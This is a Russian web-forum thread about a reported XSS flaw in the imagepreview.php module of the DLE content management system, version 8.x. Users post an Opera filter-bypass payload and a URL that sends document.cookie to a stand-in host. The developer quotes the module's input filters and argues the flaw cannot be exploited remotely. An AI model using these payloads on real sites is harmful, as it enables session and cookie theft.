Баг взлома через XSS?

[AlcVitRes 2]

Здрасти,

сегодня как в NWS, так и здесь заметил тему о.O XSS баге,

в теорий (или на практике) позволяющую взломаться в DLE.

Исправленна ли она в версий v8.5? (ступил = сносите пост).

[celsoft 6 072]

AlcVitRes,

ссылки на варезные сайты удалил. Но о чем идет речь непонятно.

[zgr 72]

AlcVitRes, ссылки на варезные сайты удалил. Но о чем идет речь непонятно.

Дело в том, что в админку нельзя войти одновременно с двух страниц браузера (не важно, это один и тот же браузер, на котором вы открываете еще одну страницу админки или совершенно другой). Если кто-то зашел в админку с одной страницы браузера, то уже никто не сможет зайти в админку с другой страницы этого или любого другого браузера этого или любого другого компьютера. Надеюсь, доходно написал, сам чуть не запутался

В общем, этот бред клепают везде для всех камээсок, якобы от стороннего взлома сайта - ерунда какая-то

[sergey_1993 1]

Вчера вечером и сегодня утром ломанули уже около 5сайтов через XSS :angry:

[celsoft 6 072]

Вчера вечером и сегодня утром ломанули уже около 5сайтов через XSS

Бред чистой воды, через XSS взломать сайт невозможно даже в теории. DLE использует специальный тип куков, доступ к которым через JS получить невозможно. А то что взламывают пачками сайты на нелегальных копиях скрипта, это не удивительно, там бекдоров и троянов напичкано, по уши.

[mitriy 5]

Вчера вечером и сегодня утром ломанули уже около 5сайтов через X

а что в логах сервера? юзерагент опера, а обращения были к engine/modules/imagepreview.php?image= ?

меня недавно долбили долго и упорно на предмет куков по этому адресу, но вроде мимо.

[TVampire 0]

Короче говоря, сейчас появились проги, которые рассылают пользователям спам-сообщения. Сегодня столкнулся с этим на своем и на парочке чужих сайтов на ДЛЕ (Движок 8.3)

[sergey_1993 1]

Короче говоря, сейчас появились проги, которые рассылают пользователям спам-сообщения. Сегодня столкнулся с этим на своем и на парочке чужих сайтов на ДЛЕ (Движок 8.3)

Ты ошибся темой http://forum.dle-news.ru/index.php?showtopic=51133

[kzpromo 1]

DLE ломали, ломают и будут ломать

Совершенству нет предела как говорит один чел

[sergey_1993 1]

http://dle-club.ru/dle/fix/565-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html

Изменено 29 мая 2010 пользователем sergey_1993

[celsoft 6 072]

sergey_1993,

Очень давно не актуально и патч для абсолютно старых версий скрипта, т.к. тех переменных в скрипте давано нет. В DLE в этом файле есть такая строчка:

if ( !$user_group[$member_id['user_group']]['allow_all_edit'] ) $author = $member_id['name'];

которая полностью исключает манипулирования с чужими файлами, если нет соответствующего доступа.

[dleua 4]

Я так понял, начались каникулы, и школота начинает воду мутить.

[demon165 8]

вообще идёт взлом через engine/modules/imagepreview.php через вызов в опере engine/modules/imagepreview.php?image=jajavascriptvascript:alert(dodocument.cookiecument.cookie) актуальна для версий оперы 9.х

[celsoft 6 072]

demiant,

Ну попробуйте взломать. Чтобы что то взломать куки нужно злоумышленнику передать, а не чтобы он сам у себя вызвал alert, а теперь попройте создать запрос на передачу данных

[WWW.ZEOS.IN 1 161]

demiant, попробовал сделать, что-то подобное и не работает

http://site.ru/engine/modules/imagepreview.php?image=javascript:location.href='http://site.ru/index.php?cookie='+document.cookie+''

Или надо как-то иначе?

[demi0s 0]

http://*********/forum/topic_6733/last#reply и как вы это объясните?

[celsoft 6 072]

http://dle-news.ru/bags/v85/1037-provedenie-ataki-mezhsajtovogo-skriptinga-xss.html

[demon165 8]

demiant, попробовал сделать, что-то подобное и не работает

http://site.ru/engine/modules/imagepreview.php?image=javascript:location.href='http://site.ru/index.php?cookie='+document.cookie+''

Или надо как-то иначе?

савргрупп на лицензии и именно так ломанули,там подстановка кукис через любой редактор куков в браузере,в файле engine/modules/imagepreview.php в самое начало кода добавить

$_GET['image'] = strtolower($_GET['image']); 

фильтрация будет

[kzpromo 1]

блин с вами не интересно, уже все карты мои раскрыли

[Dj Dance 185]

Уязвимости все закрыты? Или как?

[celsoft 6 072]

савргрупп на лицензии и именно так ломанули,там подстановка кукис через любой редактор куков в браузере,в файле engine/modules/imagepreview.php в самое начало кода добавить

$_GET['image'] = strtolower($_GET['image']); фильтрация будет

не подтвердается, в этом файле идет основная фильтрация по

$_GET['image'] = @htmlspecialchars ($_GET['image'], ENT_QUOTES);

if ( preg_match( "/[?&%<\[\]]/", $_GET['image']) ) {


	$_GET['image'] = "";


}[/code]


строки

[code]$_GET['image'] = str_replace( "document.cookie", "", $_GET['image'] );

$_GET['image'] = str_replace( "javascript", "", $_GET['image'] );

это не основной фильтр. Максимум что можно сделать это безобидный alert и то в старой версии браузера опера. Уязвимость, это когда злоумышленник может получить куки, находясь удаленно, а получить их будучи лишенным любых кавычек, а также символов ?&% он не сможет. Алерт, безусловно в новой версии я уберу, дабы не искушать, но говорить о уязвимости в данном файле не приходится. Можете проверить, на dle-news.ru лежит обычный файл от версии 8.5, попробуйте получить доступ к сайту.